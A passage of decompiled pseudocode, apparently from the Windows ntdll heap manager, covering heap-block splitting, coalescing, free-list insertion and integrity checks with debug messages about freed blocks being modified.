															_v396 = _t1438;
															_t1689 = _t1438 & 0x0000ffff;
															__eflags =  *(_t1871 + 0x4c) - _t1882;
															if( *(_t1871 + 0x4c) != _t1882) {
																_t1838 =  *(_t1871 + 0x50) ^ _t1438;
																_v396 = _t1838;
																_t1440 = _t1838 & 0x0000ffff;
																_v32 = _t1440;
																_v44 = _t1440 & 0x0000ffff;
																_t1695 = _t1838 >> 0x00000010 ^ _t1838 >> 0x00000008 ^ _t1838;
																__eflags = _t1838 >> 0x18 - _t1695;
																if(_t1838 >> 0x18 != _t1695) {
																	_push(_t1695);
																	E0107A80D(_t1871, _t1538 - 8, 0, 0);
																	_t1689 = _v32 & 0x0000ffff;
																} else {
																	_t1689 = _v44;
																}
																_t1736 = _v40;
															}
															_t1691 = _v52 - (_t1689 & 0x0000ffff);
															_v308 = _t1691;
															__eflags = _t1691;
															if(_t1691 > 0) {
																_t1538 =  *_t1538;
																continue;
															} else {
																_t1882 = _t1538;
																break;
															}
														}
														L48:
														_t1564 = _v36;
														L49:
														__eflags = _t1882;
														if(_t1882 == 0) {
															L167:
															_t1564 =  *_t1564;
															_v36 = _t1564;
															_t1523 =  *(_t1564 + 0x14);
															continue;
														}
														_v312 = _t1882;
														__eflags = _v228 - _t1882;
														if(_v228 == _t1882) {
															L248:
															_t1546 = _t1871;
															_t1518 = E00FDB236(_t1871, _a8);
															_v100 = _t1518;
															__eflags = _t1518;
															if(_t1518 == 0) {
																_v148 = 0xc0000017;
																goto L363;
															}
															_t540 = _t1518 + 8; // 0x8
															_t1738 = _t540;
															_t1883 =  *_t1738;
															_v32 = _t1883;
															_t1565 =  *(_t1518 + 0xc);
															_v88 = _t1565;
															_t1149 =  *_t1565;
															_t1566 =  *(_t1883 + 4);
															_v44 = _t1566;
															__eflags = _t1149 - _t1566;
															_t1567 = _v88;
															if(_t1149 != _t1566) {
																L536:
																_push(_t1567);
																_t1546 = 0xd;
																_t1074 = E0107A80D(_t1871, _t1738, _v44, _t1149);
																_v73 = 0;
																goto L153;
															}
															__eflags = _t1149 - _t1738;
															if(_t1149 != _t1738) {
																goto L536;
															}
															 *(_t1871 + 0x74) =  *(_t1871 + 0x74) - ( *_t1518 & 0x0000ffff);
															_t1740 =  *(_t1871 + 0xb4);
															__eflags = _t1740;
															if(_t1740 == 0) {
																L258:
																 *_t1567 = _t1883;
																 *(_t1883 + 4) = _t1567;
																__eflags =  *(_t1518 + 2) & 0x00000008;
																if(( *(_t1518 + 2) & 0x00000008) != 0) {
																	_t1151 = E00FDA229(_t1871, _t1518);
																	__eflags = _t1151;
																	if(_t1151 != 0) {
																		goto L259;
																	}
																	_t1546 = _t1871;
																	_t1074 = E00FDA309(_t1871, _t1518,  *_t1518 & 0x0000ffff, 1);
																	_v73 = 0;
																	goto L153;
																}
																L259:
																_v73 = 1;
																L76:
																_t1569 =  *(_t1518 + 2);
																_v71 = _t1569;
																__eflags = _v104;
																if(_v104 == 0) {
																	__eflags = _t1569 & 0x00000004;
																	if((_t1569 & 0x00000004) != 0) {
																		_t1905 = ( *_t1518 & 0x0000ffff) * 8 - 0x10;
																		_v244 = _t1905;
																		__eflags = _t1569 & 0x00000002;
																		if((_t1569 & 0x00000002) != 0) {
																			__eflags = _t1905 - 4;
																			if(_t1905 > 4) {
																				_t1905 = _t1905 - 4;
																				__eflags = _t1905;
																				_v244 = _t1905;
																			}
																		}
																		_t872 = _t1518 + 0x10; // 0x10
																		_t1373 = E0100D540(_t872, _t1905, 0xfeeefeee);
																		_v32 = _t1373;
																		__eflags = _t1373 - _t1905;
																		if(_t1373 != _t1905) {
																			_t1651 =  *[fs:0x30];
																			__eflags =  *(_t1651 + 0xc);
																			if( *(_t1651 + 0xc) == 0) {
																				_push("HEAP: ");
																				E00FBB150();
																				_t1941 = _t1937 + 4;
																			} else {
																				E00FBB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
																				_t1941 = _t1937 + 8;
																			}
																			_t1569 = _v100;
																			_push(_v32 + 0x10 + _t1569);
																			E00FBB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t1569);
																			_t1937 = _t1941 + 0xc;
																			_t1379 =  *[fs:0x30];
																			__eflags =  *((char*)(_t1379 + 2));
																			if( *((char*)(_t1379 + 2)) == 0) {
																				_t1518 = _v100;
																			} else {
																				 *0x10a6378 = 1;
																				_t1518 = _v100;
																				 *0x10a60c0 = _t1518;
																				asm("int3");
																				 *0x10a6378 = 0;
																			}
																		}
																	}
																}
																_v120 = _t1518;
																__eflags =  *(_t1518 + 2) & 0x00000001;
																if(( *(_t1518 + 2) & 0x00000001) != 0) {
																	_push(_t1569);
																	_t1546 = 3;
																	_t1074 = E0107A80D(_t1871, _t1518, 0, 0);
																	goto L153;
																} else {
																	 *(_t1518 + 2) = _v64;
																	_t1571 = _v52;
																	_t1885 = ( *_t1518 & 0x0000ffff) - _t1571;
																	_v320 = _t1885;
																	 *_t1518 = _t1571;
																	_t1743 = _a4;
																	_t1153 = _a8 - _t1743;
																	_v44 = _t1153;
																	__eflags = _t1153 - 0x3f;
																	if(_t1153 >= 0x3f) {
																		 *(_t1518 + _t1571 * 8 - 4) = _t1153;
																		 *(_t1518 + 7) = 0x3f;
																	} else {
																		 *(_t1518 + 7) = _t1153;
																	}
																	 *(_t1518 + 3) = 0;
																	__eflags = _t1885;
																	if(_t1885 == 0) {
																		L137:
																		_t1886 = _v120;
																		_v80 =  &(_t1886[4]);
																		_t1518 = ( *_t1886 & 0x0000ffff) * 8;
																		_v196 = _t1518;
																		__eflags = (_t1886[3] & 0x0000003f) - 0x3f;
																		if((_t1886[3] & 0x0000003f) == 0x3f) {
																			_t1158 = 1;
																		} else {
																			_t1158 = 0;
																			__eflags = 0;
																		}
																		_t1546 = _t1518;
																		__eflags = _t1158;
																		if(_t1158 != 0) {
																			_t1007 = _t1518 - 4; // -4
																			_t1546 = _t1007;
																			_t1518 = _t1546;
																			_v196 = _t1518;
																		}
																		__eflags = _v104;
																		if(_v104 == 0) {
																			_t1744 = _v96;
																			__eflags = _t1744 & 0x00000008;
																			if((_t1744 & 0x00000008) == 0) {
																				__eflags =  *(_t1871 + 0x40) & 0x00000040;
																				if(( *(_t1871 + 0x40) & 0x00000040) == 0) {
																					L296:
																					_t1525 = _a4;
																					L297:
																					__eflags =  *(_t1871 + 0x40) & 0x00000020;
																					if(( *(_t1871 + 0x40) & 0x00000020) != 0) {
																						_t1159 = _v80;
																						 *((intOrPtr*)(_t1159 + _t1525)) = 0xabababab;
																						 *((intOrPtr*)(_t1159 + _t1525 + 4)) = 0xabababab;
																						 *(_v120 + 2) =  *(_v120 + 2) | 0x00000004;
																					}
																					_t1887 = _v120;
																					 *(_t1887 + 3) = 0;
																					__eflags =  *(_t1887 + 2) & 0x00000002;
																					if(( *(_t1887 + 2) & 0x00000002) == 0) {
																						_t1074 =  *( *[fs:0x30] + 0x68);
																						_v348 = _t1074;
																						__eflags = _t1074 & 0x00000800;
																						if((_t1074 & 0x00000800) == 0) {
																							goto L301;
																						}
																						_t1518 = _v120;
																						_t1546 = _t1871;
																						 *(_t1887 + 3) = E0105E9F0(_t1871, _t1744 >> 0x00000012 & 0x000000ff, 0,  *_t1518 & 0x0000ffff, 0);
																						goto L302;
																					} else {
																						_t1546 = _t1887;
																						_t1526 = E00FB1F5B(_t1887);
																						_v276 = _t1526;
																						 *_t1526 = 0;
																						 *((intOrPtr*)(_t1526 + 4)) = 0;
																						__eflags =  *(_t1871 + 0x40) & 0x08000000;
																						if(( *(_t1871 + 0x40) & 0x08000000) != 0) {
																							_t1546 = 1;
																							 *_t1526 = E00FE16C7(1, _t1744);
																							_t1744 = _v96;
																						}
																						_t1074 =  *( *[fs:0x30] + 0x68);
																						_v344 = _t1074;
																						__eflags = _t1074 & 0x00000800;
																						if((_t1074 & 0x00000800) != 0) {
																							_t1518 = _v120;
																							_t1074 = E0105E9F0(_t1871, _t1744 >> 0x00000012 & 0x00000fff, 0,  *_t1518 & 0x0000ffff, 0);
																							_t1546 = _v276;
																							 *(_v276 + 2) = _t1074;
																							goto L302;
																						} else {
																							L301:
																							_t1518 = _v120;
																							L302:
																							__eflags =  *(_t1871 + 0x4c);
																							if( *(_t1871 + 0x4c) != 0) {
																								 *(_t1887 + 3) =  *(_t1518 + 1) ^  *_t1518 ^  *(_t1887 + 2);
																								_t1074 =  *(_t1871 + 0x50);
																								 *_t1518 =  *_t1518 ^  *(_t1871 + 0x50);
																							}
																							goto L153;
																						}
																					}
																				}
																				_t1525 = _a4;
																				E0100D5E0(_v80, _t1525 & 0xfffffffc, 0xbaadf00d);
																				_t1744 = _v96;
																				goto L297;
																			}
																			_t618 = _t1546 - 8; // -8
																			E00FFFA60(_v80, 0, _t618);
																			_t1744 = _v96;
																			goto L296;
																		} else {
																			__eflags =  *(_t1871 + 0x4c);
																			if( *(_t1871 + 0x4c) != 0) {
																				_t1889 = _v120;
																				_t1889[0] = _t1889[0] ^ _t1889[0] ^  *_t1889;
																				 *_t1889 =  *_t1889 ^  *(_t1871 + 0x50);
																				__eflags =  *_t1889;
																			}
																			__eflags = _v53;
																			if(_v53 == 0) {
																				L152:
																				_t1074 = _v96;
																				__eflags = _t1074 & 0x00000008;
																				if((_t1074 & 0x00000008) != 0) {
																					_t398 = _t1518 - 8; // -8
																					_t1074 = E00FFFA60(_v80, 0, _t398);
																				}
																				goto L153;
																			} else {
																				__eflags =  *(_t1871 + 0x44) & 0x01000000;
																				if(( *(_t1871 + 0x44) & 0x01000000) != 0) {
																					L149:
																					_t1888 =  *(_t1871 + 0xc8);
																					_t360 = _t1888 + 8;
																					 *_t360 =  *(_t1888 + 8) + 0xffffffff;
																					__eflags =  *_t360;
																					if( *_t360 != 0) {
																						L151:
																						_v53 = 0;
																						goto L152;
																					}
																					 *(_t1888 + 0xc) = 0;
																					_t1546 = _t1546 | 0xffffffff;
																					asm("lock cmpxchg [edx], ecx");
																					_t1750 = 0xfffffffe;
																					_v104 = 0xfffffffe;
																					__eflags = 0xfffffffe - 0xfffffffe;
																					if(0xfffffffe != 0xfffffffe) {
																						__eflags =  *(_t1888 + 4) & 0x00000001;
																						if(__eflags != 0) {
																							_push(_t1888);
																							E0104FF10(_t1518, 0xfffffffe, _t1871, _t1888, __eflags);
																							_t1750 = _v104;
																						}
																						while(1) {
																							__eflags = _t1750 & 0x00000002;
																							if((_t1750 & 0x00000002) == 0) {
																								_t1179 = 1;
																							} else {
																								_t1179 = 3;
																							}
																							_v88 = _t1179;
																							_t1546 = _t1179 + _t1750;
																							_t1180 = _t1750;
																							asm("lock cmpxchg [edx], ecx");
																							__eflags = _t1180 - _v104;
																							if(_t1180 == _v104) {
																								break;
																							}
																							_t1750 = _t1180;
																							_v104 = _t1750;
																						}
																						__eflags = _v88 & 0x00000002;
																						if((_v88 & 0x00000002) != 0) {
																							E00FB4DC0(_t1546, _t1888);
																						}
																					}
																					goto L151;
																				}
																				 *(_t1871 + 0x21c) =  *(_t1871 + 0x21c) + 1;
																				_t1546 =  *(_t1871 + 0x224);
																				__eflags =  *(_t1871 + 0x21c) - _t1546;
																				if( *(_t1871 + 0x21c) > _t1546) {
																					 *(_t1871 + 0x21c) = 0;
																					_t1753 =  *((intOrPtr*)(_t1871 + 0x1e8)) - ( *(_t1871 + 0x74) << 3);
																					__eflags = _t1753 -  *((intOrPtr*)(_t1871 + 0x238));
																					if(_t1753 >  *((intOrPtr*)(_t1871 + 0x238))) {
																						 *((intOrPtr*)(_t1871 + 0x238)) = _t1753;
																					}
																					 *((intOrPtr*)(_t1871 + 0x23c)) = _t1753;
																				}
																				 *(_t1871 + 0x228) =  *(_t1871 + 0x228) + 1;
																				__eflags =  *(_t1871 + 0x228) - 0x1000;
																				if( *(_t1871 + 0x228) >= 0x1000) {
																					__eflags =  *((char*)(_t1871 + 0xda)) - 2;
																					if( *((char*)(_t1871 + 0xda)) != 2) {
																						L364:
																						_t1182 = 0x10;
																						L360:
																						__eflags =  *(_t1871 + 0x220) - _t1182;
																						if( *(_t1871 + 0x220) > _t1182) {
																							__eflags = _t1546 - 0x10000;
																							if(_t1546 < 0x10000) {
																								 *(_t1871 + 0x224) = _t1546 + _t1546;
																							}
																						}
																						 *(_t1871 + 0x220) = 0;
																						 *(_t1871 + 0x228) = 0;
																						goto L149;
																					}
																					__eflags =  *((intOrPtr*)(_t1871 + 0x22c)) - 0x10;
																					if( *((intOrPtr*)(_t1871 + 0x22c)) <= 0x10) {
																						goto L364;
																					}
																					_t1182 = 0x100;
																					goto L360;
																				} else {
																					goto L149;
																				}
																			}
																		}
																	} else {
																		__eflags = _t1885 - 1;
																		if(_t1885 == 1) {
																			 *_t1518 =  *_t1518 + 1;
																			_t1192 = _a8 - _t1743 + 8;
																			_v68 = _t1192;
																			__eflags = _t1192 - 0x3f;
																			if(_t1192 >= 0x3f) {
																				 *(_t1518 + 4 + _t1571 * 8) = _t1192;
																				 *(_t1518 + 7) = 0x3f;
																			} else {
																				 *(_t1518 + 7) = _t1192;
																			}
																			goto L137;
																		}
																		__eflags = _v104;
																		if(_v104 == 0) {
																			_t1754 = 1;
																		} else {
																			_t1754 = 0;
																			__eflags = 0;
																		}
																		_v116 = _t1754;
																		_t1193 =  *((intOrPtr*)(_t1518 + 6));
																		__eflags = _t1193;
																		if(_t1193 != 0) {
																			_t1576 = (1 - (_t1193 & 0x000000ff) << 0x10) + (_t1518 & 0xffff0000);
																			_v48 = 1;
																		} else {
																			_t1576 = _t1871;
																			_v48 = _t1871;
																		}
																		_v248 = _t1576;
																		_v32 = _t1885;
																		_t1518 = _t1518 + _v52 * 8;
																		_v88 = 0;
																		 *(_t1518 + 2) = _v71;
																		 *(_t1518 + 7) = 0;
																		 *(_t1518 + 4) =  *(_t1871 + 0x54) ^ _v52;
																		__eflags =  *((intOrPtr*)(_t1576 + 0x18)) - _v48;
																		if( *((intOrPtr*)(_t1576 + 0x18)) != _v48) {
																			_t1205 = (_t1518 - _v48 >> 0x10) + 1;
																			_v32 = _t1205;
																			_v108 = _t1205;
																			__eflags = _t1205 - 0xfe;
																			if(_t1205 >= 0xfe) {
																				_push(_t1576);
																				E0107A80D( *((intOrPtr*)(_t1576 + 0x18)), _t1518, _t1576, 0);
																				_t1754 = _v116;
																				_t1205 = _v32;
																			}
																		} else {
																			_t1205 = 0;
																			__eflags = 0;
																		}
																		_v110 = _t1205;
																		 *((char*)(_t1518 + 6)) = _t1205;
																		 *(_t1518 + 3) = 0;
																		 *_t1518 = _t1885;
																		while(1) {
																			_t1577 = _t1518 + _t1885 * 8;
																			_t1209 =  *(_t1871 + 0x4c) >> 0x00000014 &  *(_t1871 + 0x52) ^ _t1577[1];
																			__eflags = _t1209 & 0x00000001;
																			if((_t1209 & 0x00000001) != 0) {
																				break;
																			}
																			__eflags =  *(_t1871 + 0x4c);
																			if( *(_t1871 + 0x4c) != 0) {
																				_t1760 =  *(_t1871 + 0x50) ^  *_t1577;
																				 *_t1577 = _t1760;
																				_t1599 = _t1760 >> 0x00000010 ^ _t1760 >> 0x00000008 ^ _t1760;
																				__eflags = _t1760 >> 0x18 - _t1599;
																				if(__eflags != 0) {
																					_push(_t1599);
																					E0106FA2B(_t1518, _t1871, _t1518 + _t1885 * 8, _t1871, _t1885, __eflags);
																				}
																				_t1577 = _t1518 + _t1885 * 8;
																			}
																			_t762 =  &(_t1577[4]); // 0xfd47f1
																			_t1755 = _t762;
																			_v32 = _t1755;
																			_v48 =  *_t1755;
																			_t765 =  &(_t1577[6]); // 0x18a164ff
																			_t1211 =  *_t765;
																			_v44 = _t1211;
																			_t1212 =  *_t1211;
																			_t768 = _v48 + 4; // 0x1475ffec
																			__eflags = _t1212 -  *_t768;
																			_t769 =  &(_t1577[4]); // 0xfd47f1
																			_t1757 = _t769;
																			if(_t1212 !=  *_t768) {
																				L523:
																				_push(_t1577);
																				_t998 = _v48 + 4; // 0x1475ffec
																				_t1546 = 0xd;
																				E0107A80D(_t1871, _t1757,  *_t998, _t1212);
																				goto L524;
																			} else {
																				__eflags = _t1212 - _t1757;
																				if(_t1212 != _t1757) {
																					goto L523;
																				}
																				 *(_t1871 + 0x74) =  *(_t1871 + 0x74) - ( *_t1577 & 0x0000ffff);
																				_t1802 =  *(_t1871 + 0xb4);
																				__eflags = _t1802;
																				if(_t1802 == 0) {
																					L381:
																					_t1217 = _v48;
																					_t1803 = _v44;
																					 *_t1803 = _t1217;
																					 *((intOrPtr*)(_t1217 + 4)) = _t1803;
																					__eflags = _t1577[1] & 0x00000008;
																					if((_t1577[1] & 0x00000008) != 0) {
																						_t1218 = E00FDA229(_t1871, _t1577);
																						__eflags = _t1218;
																						if(_t1218 != 0) {
																							goto L382;
																						}
																						_t1546 = _t1871;
																						E00FDA309(_t1871, _t1518 + _t1885 * 8,  *(_t1518 + _t1885 * 8) & 0x0000ffff, 1);
																						L524:
																						_v72 = 0;
																						__eflags = _v88;
																						if(_v88 != 0) {
																							_v112 = 0;
																							 *( *[fs:0x18] + 0xbf4) = 0xc000003c;
																							_t1890 =  *[fs:0x18];
																							_v340 = _t1890;
																							 *((intOrPtr*)(_t1890 + 0x34)) = E00FBCCC0(0xc000003c);
																							goto L153;
																						}
																						_v88 = 1;
																						_t1754 = _v116;
																						continue;
																					}
																					L382:
																					_v72 = 1;
																					_t1579 = _v116;
																					_t1805 = _t1518 + _t1885 * 8;
																					__eflags = _t1579;
																					if(_t1579 != 0) {
																						_t1219 = _t1805[1];
																						_v111 = _t1219;
																						__eflags = _t1219 & 0x00000004;
																						if((_t1219 & 0x00000004) != 0) {
																							_t1589 = _t1518 + _t1885 * 8;
																							_t1253 = ( *(_t1518 + _t1885 * 8) & 0x0000ffff) * 8 - 0x10;
																							_v192 = _t1253;
																							__eflags = _v111 & 0x00000002;
																							if((_v111 & 0x00000002) != 0) {
																								__eflags = _t1253 - 4;
																								if(_t1253 > 4) {
																									_t1253 = _t1253 - 4;
																									__eflags = _t1253;
																									_v192 = _t1253;
																								}
																							}
																							_t1255 = E0100D540( &(_t1589[8]), _t1253, 0xfeeefeee);
																							_v32 = _t1255;
																							__eflags = _t1255 - _v192;
																							if(_t1255 == _v192) {
																								_t1805 = _t1518 + _t1885 * 8;
																							} else {
																								_t1590 =  *[fs:0x30];
																								__eflags =  *(_t1590 + 0xc);
																								if( *(_t1590 + 0xc) == 0) {
																									_push("HEAP: ");
																									E00FBB150();
																									_t1940 = _t1937 + 4;
																								} else {
																									E00FBB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
																									_t1940 = _t1937 + 8;
																								}
																								_push(_v32 + 0x10 + _t1518 + _t1885 * 8);
																								E00FBB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t1518 + _t1885 * 8);
																								_t1937 = _t1940 + 0xc;
																								_t1261 =  *[fs:0x30];
																								_t1805 = _t1518 + _t1885 * 8;
																								__eflags =  *((char*)(_t1261 + 2));
																								if( *((char*)(_t1261 + 2)) != 0) {
																									 *0x10a6378 = 1;
																									 *0x10a60c0 = _t1805;
																									asm("int3");
																									 *0x10a6378 = 0;
																								}
																							}
																							_t1579 = _v116;
																						}
																					}
																					 *(_t1518 + 2) = _t1805[1];
																					_t1807 = ( *_t1805 & 0x0000ffff) + _t1885;
																					_v32 = _t1807;
																					_t1221 = _t1807 & 0x0000ffff;
																					_v32 = _t1807 & 0x0000ffff;
																					__eflags = _t1807 - 0xfe00;
																					if(_t1807 > 0xfe00) {
																						E00FDA830(_t1871, _t1518, _t1807);
																						goto L136;
																					} else {
																						 *_t1518 = _t1807;
																						_t1892 = _t1221;
																						 *(_t1518 + 4 + _t1807 * 8) =  *(_t1871 + 0x54) ^ _v32;
																						__eflags = _t1579;
																						if(_t1579 != 0) {
																							 *(_t1518 + 2) =  *(_t1518 + 2) & 0x000000f0;
																							 *(_t1518 + 7) = 0;
																							__eflags =  *(_t1871 + 0x40) & 0x00000040;
																							if(( *(_t1871 + 0x40) & 0x00000040) != 0) {
																								_t969 = _t1518 + 0x10; // 0x10
																								E0100D5E0(_t969, _t1892 * 8 - 0x10, 0xfeeefeee);
																								_t970 = _t1518 + 2;
																								 *_t970 =  *(_t1518 + 2) | 0x00000004;
																								__eflags =  *_t970;
																							}
																							_t1227 = _t1871 + 0xc0;
																							__eflags =  *(_t1871 + 0xb4);
																							if( *(_t1871 + 0xb4) == 0) {
																								_t1581 =  *_t1227;
																							} else {
																								_t1581 = E00FDE12C(_t1871, _t1892);
																								_t1227 = _t1871 + 0xc0;
																							}
																							while(1) {
																								__eflags = _t1227 - _t1581;
																								if(_t1227 == _t1581) {
																									break;
																								}
																								__eflags =  *(_t1871 + 0x4c);
																								if( *(_t1871 + 0x4c) == 0) {
																									_t1811 =  *(_t1581 - 8);
																								} else {
																									_t1811 =  *(_t1581 - 8);
																									_v132 = _t1811;
																									__eflags =  *(_t1871 + 0x4c) & _t1811;
																									if(( *(_t1871 + 0x4c) & _t1811) != 0) {
																										_t1811 = _t1811 ^  *(_t1871 + 0x50);
																										_v132 = _t1811;
																									}
																								}
																								_v136 = _t1811;
																								__eflags = _t1892 - (_t1811 & 0x0000ffff);
																								if(_t1892 <= (_t1811 & 0x0000ffff)) {
																									break;
																								} else {
																									_t1581 =  *_t1581;
																									_t1227 = _t1871 + 0xc0;
																									continue;
																								}
																							}
																							_t986 = _t1518 + 8; // 0x8
																							_t1893 = _t986;
																							_t1228 =  *((intOrPtr*)(_t1581 + 4));
																							_t1809 =  *_t1228;
																							__eflags = _t1809 - _t1581;
																							if(_t1809 != _t1581) {
																								_push(_t1581);
																								__eflags = 0;
																								E0107A80D(0, _t1581, 0, _t1809);
																							} else {
																								 *_t1893 = _t1581;
																								 *((intOrPtr*)(_t1893 + 4)) = _t1228;
																								 *_t1228 = _t1893;
																								 *((intOrPtr*)(_t1581 + 4)) = _t1893;
																							}
																							 *(_t1871 + 0x74) =  *(_t1871 + 0x74) + ( *_t1518 & 0x0000ffff);
																							_t1765 =  *(_t1871 + 0xb4);
																							__eflags = _t1765;
																							if(_t1765 == 0) {
																								L134:
																								__eflags =  *(_t1871 + 0x4c);
																								if( *(_t1871 + 0x4c) != 0) {
																									 *(_t1518 + 3) =  *(_t1518 + 2) ^  *(_t1518 + 1) ^  *_t1518;
																									 *_t1518 =  *_t1518 ^  *(_t1871 + 0x50);
																									__eflags =  *_t1518;
																								}
																								L136:
																								_v112 = 1;
																								_v71 = 0;
																								goto L137;
																							} else {
																								_t1583 =  *_t1518 & 0x0000ffff;
																								while(1) {
																									__eflags = _t1583 -  *((intOrPtr*)(_t1765 + 4));
																									if(_t1583 <  *((intOrPtr*)(_t1765 + 4))) {
																										break;
																									}
																									_t1235 =  *_t1765;
																									__eflags = _t1235;
																									if(_t1235 != 0) {
																										_t1765 = _t1235;
																										continue;
																									}
																									_t1236 =  *((intOrPtr*)(_t1765 + 4)) - 1;
																									__eflags = _t1236;
																									L520:
																									_v272 = _t1236;
																									L329:
																									E00FDE4A0(_t1871, _t1765, 1, _t1893, _t1236, _t1583);
																									goto L134;
																								}
																								_t1236 = _t1583;
																								goto L520;
																							}
																						}
																						 *(_t1518 + 2) = _t1579;
																						 *(_t1518 + 7) = _t1579;
																						_t1244 = _t1871 + 0xc0;
																						__eflags =  *(_t1871 + 0xb4);
																						if( *(_t1871 + 0xb4) == 0) {
																							_t1586 =  *_t1244;
																						} else {
																							_t1586 = E00FDE12C(_t1871, _t1892);
																							_t1244 = _t1871 + 0xc0;
																						}
																						while(1) {
																							__eflags = _t1244 - _t1586;
																							if(_t1244 == _t1586) {
																								break;
																							}
																							__eflags =  *(_t1871 + 0x4c);
																							if( *(_t1871 + 0x4c) == 0) {
																								_t1813 =  *(_t1586 - 8);
																							} else {
																								_t1813 =  *(_t1586 - 8);
																								_v92 = _t1813;
																								__eflags =  *(_t1871 + 0x4c) & _t1813;
																								if(( *(_t1871 + 0x4c) & _t1813) != 0) {
																									_t1813 = _t1813 ^  *(_t1871 + 0x50);
																									_v92 = _t1813;
																								}
																							}
																							_v138 = _t1813;
																							__eflags = _t1892 - (_t1813 & 0x0000ffff);
																							if(_t1892 <= (_t1813 & 0x0000ffff)) {
																								break;
																							} else {
																								_t1586 =  *_t1586;
																								_t1244 = _t1871 + 0xc0;
																								continue;
																							}
																						}
																						_t803 = _t1518 + 8; // 0x8
																						_t1893 = _t803;
																						_t1246 =  *((intOrPtr*)(_t1586 + 4));
																						_t1814 =  *_t1246;
																						__eflags = _t1814 - _t1586;
																						if(_t1814 != _t1586) {
																							_push(_t1586);
																							E0107A80D(0, _t1586, 0, _t1814);
																						} else {
																							 *_t1893 = _t1586;
																							 *((intOrPtr*)(_t1893 + 4)) = _t1246;
																							 *_t1246 = _t1893;
																							 *((intOrPtr*)(_t1586 + 4)) = _t1893;
																						}
																						 *(_t1871 + 0x74) =  *(_t1871 + 0x74) + ( *_t1518 & 0x0000ffff);
																						_t1765 =  *(_t1871 + 0xb4);
																						__eflags = _t1765;
																						if(_t1765 == 0) {
																							goto L134;
																						} else {
																							_t1583 =  *_t1518 & 0x0000ffff;
																							while(1) {
																								__eflags = _t1583 -  *((intOrPtr*)(_t1765 + 4));
																								if(_t1583 <  *((intOrPtr*)(_t1765 + 4))) {
																									break;
																								}
																								_t1249 =  *_t1765;
																								__eflags = _t1249;
																								if(_t1249 != 0) {
																									_t1765 = _t1249;
																									continue;
																								}
																								_t1236 =  *((intOrPtr*)(_t1765 + 4)) - 1;
																								__eflags = _t1236;
																								L395:
																								_v268 = _t1236;
																								goto L329;
																							}
																							_t1236 = _t1583;
																							goto L395;
																						}
																					}
																				}
																				_t1594 =  *_t1577 & 0x0000ffff;
																				while(1) {
																					__eflags = _t1594 -  *((intOrPtr*)(_t1802 + 4));
																					if(_t1594 <  *((intOrPtr*)(_t1802 + 4))) {
																						break;
																					}
																					_t1269 =  *_t1802;
																					__eflags = _t1269;
																					if(_t1269 != 0) {
																						_t1802 = _t1269;
																						continue;
																					}
																					_t1267 =  *((intOrPtr*)(_t1802 + 4)) - 1;
																					__eflags = _t1267;
																					L380:
																					_v264 = _t1267;
																					E00FDBC04(_t1871, _t1802, 1, _v32, _t1267, _t1594);
																					_t1577 = _t1518 + _t1885 * 8;
																					goto L381;
																				}
																				_t1267 = _t1594;
																				goto L380;
																			}
																		}
																		_t1894 = _t1885 & 0x0000ffff;
																		_v48 = _t1894;
																		_t1577[2] =  *(_t1871 + 0x54) ^ _t1894;
																		__eflags = _t1754;
																		if(_t1754 != 0) {
																			 *(_t1518 + 2) =  *(_t1518 + 2) & 0x000000f0;
																			 *(_t1518 + 7) = 0;
																			__eflags =  *(_t1871 + 0x40) & 0x00000040;
																			if(( *(_t1871 + 0x40) & 0x00000040) != 0) {
																				_t911 = _t1518 + 0x10; // 0x10
																				E0100D5E0(_t911, _t1894 * 8 - 0x10, 0xfeeefeee);
																				 *(_t1518 + 2) =  *(_t1518 + 2) | 0x00000004;
																			}
																			_t1281 = _t1871 + 0xc0;
																			__eflags =  *(_t1871 + 0xb4);
																			if( *(_t1871 + 0xb4) == 0) {
																				_t1601 =  *_t1281;
																			} else {
																				_t1601 = E00FDE12C(_t1871, _t1894);
																				_t1281 = _t1871 + 0xc0;
																			}
																			while(1) {
																				__eflags = _t1281 - _t1601;
																				if(_t1281 == _t1601) {
																					break;
																				}
																				__eflags =  *(_t1871 + 0x4c);
																				if( *(_t1871 + 0x4c) == 0) {
																					_t1766 =  *(_t1601 - 8);
																				} else {
																					_t1766 =  *(_t1601 - 8);
																					_v156 = _t1766;
																					__eflags =  *(_t1871 + 0x4c) & _t1766;
																					if(( *(_t1871 + 0x4c) & _t1766) != 0) {
																						_t1766 = _t1766 ^  *(_t1871 + 0x50);
																						__eflags = _t1766;
																						_v156 = _t1766;
																					}
																				}
																				_v134 = _t1766;
																				__eflags = _t1894 - (_t1766 & 0x0000ffff);
																				if(_t1894 > (_t1766 & 0x0000ffff)) {
																					_t1601 =  *_t1601;
																					_t1281 = _t1871 + 0xc0;
																					continue;
																				} else {
																					break;
																				}
																			}
																			_t674 = _t1518 + 8; // 0x8
																			_t1893 = _t674;
																			_t1282 =  *((intOrPtr*)(_t1601 + 4));
																			_t1763 =  *_t1282;
																			__eflags = _t1763 - _t1601;
																			if(_t1763 != _t1601) {
																				_push(_t1601);
																				E0107A80D(0, _t1601, 0, _t1763);
																			} else {
																				 *_t1893 = _t1601;
																				 *((intOrPtr*)(_t1893 + 4)) = _t1282;
																				 *_t1282 = _t1893;
																				 *((intOrPtr*)(_t1601 + 4)) = _t1893;
																			}
																			 *(_t1871 + 0x74) =  *(_t1871 + 0x74) + ( *_t1518 & 0x0000ffff);
																			_t1765 =  *(_t1871 + 0xb4);
																			__eflags = _t1765;
																			if(_t1765 == 0) {
																				goto L134;
																			} else {
																				_t1583 =  *_t1518 & 0x0000ffff;
																				while(1) {
																					__eflags = _t1583 -  *((intOrPtr*)(_t1765 + 4));
																					if(_t1583 <  *((intOrPtr*)(_t1765 + 4))) {
																						break;
																					}
																					_t1285 =  *_t1765;
																					__eflags = _t1285;
																					if(_t1285 == 0) {
																						_t1236 =  *((intOrPtr*)(_t1765 + 4)) - 1;
																						L328:
																						_v260 = _t1236;
																						goto L329;
																					}
																					_t1765 = _t1285;
																				}
																				_t1236 = _t1583;
																				goto L328;
																			}
																		}
																		 *(_t1518 + 2) = _t1754;
																		 *(_t1518 + 7) = _t1754;
																		_t1289 = _t1871 + 0xc0;
																		_t1604 =  *(_t1871 + 0xb4);
																		_v36 = _t1604;
																		__eflags = _t1604;
																		if(_t1604 == 0) {
